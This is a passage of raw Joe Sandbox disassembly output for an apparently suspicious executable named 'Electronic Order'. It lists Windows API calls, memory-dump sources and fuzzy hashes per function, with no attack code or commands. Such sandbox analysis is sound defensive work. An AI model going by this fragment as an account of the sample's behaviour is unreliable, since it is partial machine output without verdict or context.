                                      • Opcode Fuzzy Hash: e2e02939359edfb6b3998bad5fe495b4446edafbb395754bddd072e03e74ebf3
                                      • Instruction Fuzzy Hash: AC21F935604244BBEB255B3ADC49EBB7BACDF49B50F00417AFC05EA1A1EF61DC8196B0
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4B44C
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E4B471
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E4B489
                                      • GetSystemMetrics.USER32(00000004), ref: 00E4B4B2
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E31184,00000000), ref: 00E4B4D0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID:
                                      • API String ID: 2294984445-0
                                      • Opcode ID: 0872c3f19528f890223c8dfc0fb7fe98f80782c239c966504ea378dc977c89b2
                                      • Instruction ID: 215968f23ccc84fe5016313f126a79b71d7d3be807fbf8a1ed6a46d45b3ae035
                                      • Opcode Fuzzy Hash: 0872c3f19528f890223c8dfc0fb7fe98f80782c239c966504ea378dc977c89b2
                                      • Instruction Fuzzy Hash: 3A218D31A10265AFCB249F39AC04A6A3BA4EB05725F115728F93AE21E1E730D811DB90
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E19802
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E19834
                                      • __itow.LIBCMT ref: 00E1984C
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E19874
                                      • __itow.LIBCMT ref: 00E19885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 604dcedf1515af4d225906600332297af85e83d42f5579d02d7f1dd2253b6ae8
                                      • Instruction ID: 4ef24dbb410eee183989618031b83f224082348f9236fd90b7c3b6b6e55f09f4
                                      • Opcode Fuzzy Hash: 604dcedf1515af4d225906600332297af85e83d42f5579d02d7f1dd2253b6ae8
                                      • Instruction Fuzzy Hash: C1210A31B00204BFDB14AA659C8AEEE3BADEF4AB14F041068FD05FB242D6708D8597F1
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                      • SelectObject.GDI32(?,00000000), ref: 00DC135C
                                      • BeginPath.GDI32(?), ref: 00DC1373
                                      • SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 15f4bc55bff814470839c341b8c0eb7ea8007bc693585563cfa197ce447ecfb6
                                      • Instruction ID: bc2d1d183667cd8697606d5e24f9c1704b15200a7305a1a766a0c7561d57d971
                                      • Opcode Fuzzy Hash: 15f4bc55bff814470839c341b8c0eb7ea8007bc693585563cfa197ce447ecfb6
                                      • Instruction Fuzzy Hash: AD21B874800355DFDB149F56EC09B697BB8F702725F14821AF41CB71A1D3719859CFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 521e28a60e758ed4c4e3c0e2a4a03f8fc681f6c5b77c3f25dba75775f2e24818
                                      • Instruction ID: e1e072b9a805a5c1fc3b78521c76401516e120b5017a40c652003e75e1c7a9c8
                                      • Opcode Fuzzy Hash: 521e28a60e758ed4c4e3c0e2a4a03f8fc681f6c5b77c3f25dba75775f2e24818
                                      • Instruction Fuzzy Hash: 2D01B9727C52057BD204B5255C42FEB73ACDB11398F645419FE04F7243E661DE9582F1
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00E24D5C
                                      • __beginthreadex.LIBCMT ref: 00E24D7A
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E24D8F
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E24DA5
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E24DAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: e1a1f1f1e1a6d4e4401774cd49da6358b82b876a69ae650e8dc493ce83e8d6f7
                                      • Instruction ID: 09445a23a10badaeece45cf308fd6d1c748905c0dc8e7c9f493e340d5e92b395
                                      • Opcode Fuzzy Hash: e1a1f1f1e1a6d4e4401774cd49da6358b82b876a69ae650e8dc493ce83e8d6f7
                                      • Instruction Fuzzy Hash: 141108B6904258FFC7019FA9EC04ADA7FACEB45724F1442A5F918F73A1D6718D0887B0
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                      • GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                      • HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 2d81a0bdd8ec175597e7ef60164597755b87b93354820fda54477e9d1f6ac746
                                      • Instruction ID: 4558adfe5d37513ba49547e8f6d3748878cb70f1bcb680ba86be9b091b2f3c22
                                      • Opcode Fuzzy Hash: 2d81a0bdd8ec175597e7ef60164597755b87b93354820fda54477e9d1f6ac746
                                      • Instruction Fuzzy Hash: F2016D75601204FFDB205FA6DD88DAB7BACFF8A755720047AF949E2260DA318C45CA60
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E25502
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E25510
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E25518
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E25522
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: a85b644912ee4b0795b99812cbab434ae36d2e9603efcb5ba2f62e7c88f3eab7
                                      • Instruction ID: c64dba1f28fbec7bd371b7c2e01cd7f3afb04d54ba9b79112d181c076372b3f4
                                      • Opcode Fuzzy Hash: a85b644912ee4b0795b99812cbab434ae36d2e9603efcb5ba2f62e7c88f3eab7
                                      • Instruction Fuzzy Hash: 45015B36C01A29DBCF00EFE9E9885EDBB79FB0A711F040056E911B2240DB305554C7A1
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?,?,00E1799D), ref: 00E1766F
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E1768A
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E17698
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?), ref: 00E176A8
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E1758C,80070057,?,?), ref: 00E176B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 87d284233bde260df38629ff634b15d1faedceb630adc61a528215672dec956c
                                      • Instruction ID: e2be7e6d51a81199d12b49da148e98c6649b25305bdfed2b47c58c71ced407d6
                                      • Opcode Fuzzy Hash: 87d284233bde260df38629ff634b15d1faedceb630adc61a528215672dec956c
                                      • Instruction Fuzzy Hash: A701B1B6600604AFDB104F59DC04AAA7FBCEB49F51F100028FD44E7211EB31DD8187A0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E18608
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E18612
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E18621
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E18628
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1863E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: b0153c8f16ca5c67163b595e0659267eab3f714befae33bfcbc004d9ec48bcaa
                                      • Instruction ID: f38e96547cb7b586194f5de8cea5d2f95ff595712184a926028b3e1fc3253ce3
                                      • Opcode Fuzzy Hash: b0153c8f16ca5c67163b595e0659267eab3f714befae33bfcbc004d9ec48bcaa
                                      • Instruction Fuzzy Hash: A6F06235201204AFEB200FA6DD8DEAB3BACEF8AB58B001425F945E6151CB71DC86DA60
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E18669
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E18673
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18682
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E18689
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E1869F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: bc12312f27417ec86cddf4598460f3d3305a6d04cb951ba700021ee63f7e8b95
                                      • Instruction ID: 1ec98915111cbf4a07c402b88526d0a579dcfe291a5c7ebdde503e4d418d0e77
                                      • Opcode Fuzzy Hash: bc12312f27417ec86cddf4598460f3d3305a6d04cb951ba700021ee63f7e8b95
                                      • Instruction Fuzzy Hash: 9DF06279201304AFEB211FA6EC88EA73BACEF8AB58B100035F945E6151CB71DD46DA60
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C6BA
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E1C6D1
                                      • MessageBeep.USER32(00000000), ref: 00E1C6E9
                                      • KillTimer.USER32(?,0000040A), ref: 00E1C705
                                      • EndDialog.USER32(?,00000001), ref: 00E1C71F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 77213f7f82c90833b533fa3928ee9445a810f8d4877b9f56058840d265d231a6
                                      • Instruction ID: e34295fedf9008e77a7500628c95d2084633e2ed8ec7812eeaac323f2ecaefcf
                                      • Opcode Fuzzy Hash: 77213f7f82c90833b533fa3928ee9445a810f8d4877b9f56058840d265d231a6
                                      • Instruction Fuzzy Hash: A5018F34440304ABEB215B21DD4EFE677B8FB05B05F0016AAF542F14E0DBE0A9998E90
                                      APIs
                                      • EndPath.GDI32(?), ref: 00DC13BF
                                      • StrokeAndFillPath.GDI32(?,?,00DFBAD8,00000000,?), ref: 00DC13DB
                                      • SelectObject.GDI32(?,00000000), ref: 00DC13EE
                                      • DeleteObject.GDI32 ref: 00DC1401
                                      • StrokePath.GDI32(?), ref: 00DC141C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: bf36f7cc94457193884ac90a891015fa10ea7e36001056d9c63bb90260c2046d
                                      • Instruction ID: 4f6a3d17afcb7fbc26bc3ad255137b8498bf32f2cf97d96537b3abc8a58613c3
                                      • Opcode Fuzzy Hash: bf36f7cc94457193884ac90a891015fa10ea7e36001056d9c63bb90260c2046d
                                      • Instruction Fuzzy Hash: 15F0E134004349DFDB195F57EC0CB543FA4AB42726F18C228E46D690F2C731459ADF60
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E2C69D
                                      • CoCreateInstance.OLE32(00E52D6C,00000000,00000001,00E52BDC,?), ref: 00E2C6B5
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • CoUninitialize.OLE32 ref: 00E2C922
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: a3e02014e578a729817db3d893473e2cec415b213bc3b222586808e3db5a0546
                                      • Instruction ID: d3a9ac81e561d5f86e76f67315710ac105e7dbc7bc155bad2a2495389bc2f45b
                                      • Opcode Fuzzy Hash: a3e02014e578a729817db3d893473e2cec415b213bc3b222586808e3db5a0546
                                      • Instruction Fuzzy Hash: 66A12B71108306AFD700EF54C895EABB7E8EF95704F04495CF1969B1A2EB70EA49CB72
                                      APIs
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00DC7BB1: _memmove.LIBCMT ref: 00DC7C0B
                                      • __swprintf.LIBCMT ref: 00DD302D
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00DD2EC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: 0eb4891d03910726f885444767bc7cbebfcfb7d524b2deb3e7f4186b4323f73b
                                      • Instruction ID: 289e34aba6bf42b3ad67bc12c07838d1d4033e0f3082ce50ebb003e7e3598328
                                      • Opcode Fuzzy Hash: 0eb4891d03910726f885444767bc7cbebfcfb7d524b2deb3e7f4186b4323f73b
                                      • Instruction Fuzzy Hash: 48917E712083429FC728EF24D885E7EB7A4EF85750F04491EF4869B2A1DA70EE44CB72
                                      APIs
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                      • CoInitialize.OLE32(00000000), ref: 00E2BC26
                                      • CoCreateInstance.OLE32(00E52D6C,00000000,00000001,00E52BDC,?), ref: 00E2BC3F
                                      • CoUninitialize.OLE32 ref: 00E2BC5C
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 8d15d8746f1798c84c27a4da848869b848be523c0dc16e1c4c18b3fedc6dc555
                                      • Instruction ID: 6aeb71bb7ce867ecd7e4b81206fb26e026f8747097257af7af28d40d515724cc
                                      • Opcode Fuzzy Hash: 8d15d8746f1798c84c27a4da848869b848be523c0dc16e1c4c18b3fedc6dc555
                                      • Instruction Fuzzy Hash: 4EA155752043129FCB04DF24C494E5ABBE5FF88314F05898CF899AB2A1CB31ED45CBA1
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00E1B981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container$%
                                      • API String ID: 3565006973-1286912533
                                      • Opcode ID: ac6096aefd05e48246b10f272b808bc64faec97c977f24d7dffba1f25c606aa8
                                      • Instruction ID: 407a112577d19bafa6cfa5866b394d33db7ca0bf0dad75e77af68049e204e12d
                                      • Opcode Fuzzy Hash: ac6096aefd05e48246b10f272b808bc64faec97c977f24d7dffba1f25c606aa8
                                      • Instruction Fuzzy Hash: 69915D706003019FDB24DF24C885AA6BBF9FF49714F14956DF94AEB291DB70E881CB60
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00DE52DD
                                        • Part of subcall function 00DF0340: __87except.LIBCMT ref: 00DF037B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
